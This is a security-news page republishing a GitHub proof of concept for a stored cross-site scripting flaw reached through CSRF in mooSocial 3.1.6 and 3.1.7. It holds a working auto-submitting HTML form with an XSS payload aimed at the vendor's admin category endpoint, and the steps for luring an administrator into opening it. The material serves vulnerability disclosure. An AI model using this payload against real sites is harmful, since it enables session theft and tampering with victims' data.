Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-40869: GitHub - MinoTauro2020/CVE-2023-40869: Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_me

Cross Site Scripting vulnerability in mooSocial mooSocial Software 3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions.

CVE
Open in Source
#xss#csrf#vulnerability#web#git

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

  • Use Git or checkout with SVN using the web URL.

  • Open with GitHub Desktop

  • Download ZIP

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

# CVE-2023-40869 Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 and 3.1.7 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions

XSS STORE via CSRF.

#Paths Affected http://admin-socialcommerce.moosocial.com/admin/group/group_categories http://admin-socialcommerce.moosocial.com/admin/coupon/ http://admin-socialcommerce.moosocial.com/admin/menu/manage/edit_menu/6

Poc:

1 - Make a file with this HTML and with and include XSS PAYLOAD

<html> <body> <form action="http://admin-socialcommerce.moosocial.com/admin/group/group_categories/save" method="POST"> <input type="hidden" name="data[id]" value="" /> <input type="hidden" name="data[name]" value="test"><img src=a onerror=alert(document.cookie)>test" /> ##payload in this example and encoded : test"><img src=a onerror=alert(document.cookie)>test <input type="hidden" name="data[type]" value="Group" /> <input type="hidden" name="data[header]" value="0" /> <input type="hidden" name="data[header]" value="1" /> <input type="hidden" name="data[parent_id]" value="0" /> <input type="hidden" name="data[description]" value="" /> <input type="hidden" name="data[active]" value="0" /> <input type="hidden" name="data[active]" value="1" /> <input type="hidden" name="data[everyone]" value="0" /> <input type="hidden" name="data[everyone]" value="1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('’, '’, ‘/’); document.forms[0].submit(); </script> </body> </html>

2 - Example test.html

3 - Send to the victim

4 - When the victim open the html the file test.html will open in his navigator and when he will open and press click the code will inject a payload and will be store at the DataBase

About

Cross Site Scripting vulnerability in mooSocial mooSocial Software v.3.1.6 allows a remote attacker to execute arbitrary code via a crafted script to the edit_menu, copuon, and group_categorias functions

Resources

Readme

Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE